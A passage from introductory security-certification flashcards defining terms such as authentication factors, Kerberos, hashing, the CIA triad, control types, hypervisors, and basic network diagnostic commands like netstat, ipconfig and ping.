within an organization are responsible for protecting data.

identification

Users claim an identity with a unique username.

Common Access Card (CAC)

A Department of Defense (DoD) smart card used for identification. Also includes a picture of the user and other readable information.

tracert command (traceroute on Mac)

A Microsoft Windows-based command that displays every router hop along the path from a source host to a destination host on an IP network. Information about a router hop can include such information as the IP address of the router hop and the round-trip delay of that router hop.

ifconfig

A TCP/IP configuration and management utility used with UNIX and Linux systems. Same as ipconfig on Windows. (Short for interface configuration)

Hashing

A cryptographic method that uses an algorithm such as MD5 or SHA (SHA-1, -256, -384, -512) to create a hash of a message. If the message changes, the hash will change. Cryptographic hashes are calculated against a message or a file. Hashing doesn't tell you what modified a message, just whether it has been modified. Hashing verifies integrity. It is the process of converting a message, or data, into a numeric value.

Steganography

A field within cryptography; uses images to hide data. Hiding a message within a message.

Geolocation

A group of technologies used to identify a user's location; it is the most common method used for the somewhere-you-are factor.

Type I hypervisor

A hypervisor that can run directly on a computer without an underlying host operating system. Used for virtualization in large-scale data centers.

Type II hypervisor

A hypervisor that runs within a conventional operating system environment. Used for implementing virtualization on a PC.

Authentication

A method for confirming users' identities, such as with a password. The process of verifying that the sender is who they say they are.

Password Expiration

An account enforcement policy that determines how many days a password can be used before the user is required to change it.

Password Complexity

An account enforcement policy that requires passwords to meet complexity requirements.

Application Cell

Also known as application containers. A virtualization technology that runs services or applications within isolated application cells (or containers). Each container shares the kernel of the host. Basically, it removes the guest OS in order to reduce overhead; the guest OS is not needed in many cases. (Kubernetes or Docker)

Something you do

An authentication factor indicating action, such as gestures on a touch screen.

Somewhere you are

An authentication factor indicating location, often using geolocation technologies.

Kerberos

An authentication system developed by the Massachusetts Institute of Technology (MIT) and used to verify the identity of networked users. Used within Windows Active Directory domains and some Unix environments known as realms. A method of issuing tickets. Kerberos version 5 requires the time of all systems to be synchronized and within five minutes of each other. It relies on a database of subjects or users; in a Microsoft environment, this is Active Directory, but it could be any database of users. Kerberos is a network authentication protocol.

AAA

Authentication, Authorization, and Accounting. AAA protocols are used in remote access systems. For example, TACACS+ is an AAA protocol that uses multiple challenges and responses during a session. Authentication verifies a user's identification. Authorization determines if a user should have access. Accounting tracks a user's access with logs.

False rejection

A biometric system incorrectly rejects an authorized user. The false rejection rate (FRR, also known as false nonmatch rate) identifies the percentage of times false rejections occur.

ARP command

Can be used in either the Microsoft Windows or the UNIX environment to see what a Layer 2 MAC address corresponds to in a Layer 3 IP address. (Address Resolution Protocol)

Patching

Can fix software bugs and increase availability.

Changing default passwords

Changing the default password on software and devices, and also changing the default administrator username.

CIA security triad

Confidentiality, Integrity, Availability

load balancing

Distributing a computing or networking workload across multiple systems to avoid congestion and slow performance.

Use Case

Describes a goal that an organization wants to achieve. Identify and clarify requirements to achieve the goal.

Dual-factor authentication (two-factor authentication/2FA, 2-step authentication)

Different factors of authentication, such as something you have and something you know.

Certificates

Digitally signed electronic documents that bind a public key with a user identity. Digital signatures require the use of certificates and a public key infrastructure. Certificates provide the primary method of identifying that a given user is valid, can be used to store authorization information, and can verify or certify that a system is using the correct software and processes to communicate.

netstat -n

Displays addresses and port numbers in numerical order.

netstat -a

Displays all connections and listening ports.

Requirements for a smart card

Embedded certificate and public key infrastructure

Biometric errors

False Acceptance, False Rejection, Crossover error rate (CER).

Disk Redundancies

Fault-tolerant disks such as RAID-1, RAID-5, and RAID-6 allow a system to continue to operate even if a disk fails

Biometric methods

Fingerprints, retina scanners, iris scanners, voice recognition, facial recognition. Not 100% safe; multifactor authentication is needed.

Cooling systems

Heating, ventilation, and air conditioning (HVAC) systems improve the availability of systems by reducing outages from overheating.

Access Control

Identification, Authentication, and Authorization combined provide access controls and help ensure that only authorized personnel can access data.

Availability

Indicates that data and services are available when needed. Implement redundancy and fault-tolerant methods to ensure high levels of availability for key systems.

Password history and password reuse

Many users would prefer to use the same password forever simply because it's easier to remember.

VM Sprawl

Occurs when an organization has many VMs that aren't managed properly.

Guest (virtualization)

Operating systems running on the host system are guests or guest machines.

Password management features

Password complexity, password expiration, password history and password reuse, changing default passwords.

Something you know

Password or PIN

ping -t

Pings continuously, sending ICMP packets until stopped with Ctrl+C.

Encryption

Process of converting readable data into unreadable characters to prevent unauthorized access.

Authentication (AAA)

Prove an Identity.

Integrity

Provides assurance that data has not changed. Verifies that data has NOT been modified in transport or at rest.

snapshot

Provides you with a copy of the VM at a moment in time, which you can use as a backup.

Risk Mitigation

Reduces the chances that a threat will exploit a vulnerability, or reduce the impact of the risk, by implementing security controls. Accomplished anytime steps are taken to reduce risk.

ipconfig /flushdns

Will clear your DNS resolver cache.

ipconfig /all

Shows all TCP/IP details.

Hypervisor

Software that creates, runs, and manages virtual machines.

Authentication Factors

Something you know, something you have, something you are, somewhere you are, and something you do

Key Distribution Center (KDC)

System for granting authentication in Kerberos. It uses a complex process of issuing ticket-granting tickets (TGTs) and other tickets. The KDC (or TGT server) packages user credentials within a ticket.

First three control types

Technical, Administrative, Physical

Site Redundancies

An organization can move critical systems to an alternate site, such as a hot site.

Non-repudiation

The security principle of providing proof that a transaction occurred between identified parties. Repudiation occurs when one party in a transaction denies that the transaction took place. Non-repudiation prevents one party from denying actions that they carried out.

ipconfig

The utility used to display TCP/IP addressing and domain name information in the Windows client operating systems.

netstat -e (command)

This displays Ethernet statistics such as the number of packets and bytes sent and received.

netstat command

This displays TCP and UDP connections. Allows you to view statistics for TCP/IP protocols on a system.

netstat -s (command)

This displays statistics per protocol, such as TCP, UDP, ICMP, IP, etc.

netstat -r (command)

This displays the route table.

False acceptance

This is when a biometric system incorrectly identifies an unauthorized user as an authorized user.

multifactor authentication (MFA)

To use more than one method to authenticate access to a computer, network, or other resource, e.g. combining the something-you-are factor with one or more other factors of authentication.

Alternate Power

Uninterruptible power supplies (UPSs) and power generators can provide power to key systems even if commercial power fails.

Technical Controls

Using technology that is carried out or managed by devices as a basis for controlling the access to and usage of sensitive data. e.g. Encryption, Antivirus software, Intrusion detection systems and intrusion prevention systems, firewalls and least privilege.

ping

a DOS command that tests connectivity and isolates hardware problems and any mismatched configurations.

New Technology LAN Manager (NTLM)

a suite of protocols that provide authentication, integrity, and confidentiality within Windows systems. The successor to the authentication protocol in Microsoft LAN Manager (LANMAN), an older Microsoft product.

digital signature

an encrypted hash of a message that a person, website, or organization attaches to an electronic message to verify the identity of the message sender and that the message has not been modified. The sender's private key encrypts the hash of the message to create the digital signature. The recipient decrypts the hash with the sender's public key. If successful, it provides authentication, non-repudiation, and integrity. Authentication identifies the sender. Integrity verifies the message has not been modified. Non-repudiation prevents senders from later denying they sent an email.

Detective Controls

controls designed to discover control problems that were not prevented. e.g. Log monitoring, trend analysis, security audit, video surveillance, motion detection.

Preventive Controls

controls that deter problems before they arise. e.g. Hardening, security awareness training, security guards, change management, account disablement policy.

Corrective Controls

controls that identify and correct problems as well as recover from the resulting errors. They reverse the impact of an incident or problem after it has occurred. e.g. IPS, backups and system recovery.

Backups

copies of data created to ensure that if the original data is lost or corrupted, operations can resume after restoring data from the backup. Without data backups, data is lost forever.

Smart cards

credit card-sized cards that have an embedded microchip and a certificate.

Embedded certificate

holds a user's private key (only accessible to the user) and is matched with a public key (publicly available to others).

vulnerability

is a weakness. It can be a weakness in the hardware, the software, the configuration, or even the user's operating system. A flaw or weakness in software or hardware, or a weakness in a process that a threat could exploit, resulting in a security breach. For example, lack of updates, default configurations, lack of anti-malware software and firewalls.

Retina scanners

scan the retina of one or both eyes and use the pattern of blood vessels at the back of the eye for recognition.

Public key infrastructure (PKI)

supports issuing and managing certificates.

Confidentiality

the act of preventing data from being disclosed to those who should not have access.

Obfuscation

the action of making something obscure, unclear, or unintelligible.

Administrative Controls

use methods mandated by organizational policies or other guidelines. e.g. Risk assessment, vulnerability assessments, penetration tests, awareness training, configuration and change management, contingency planning.
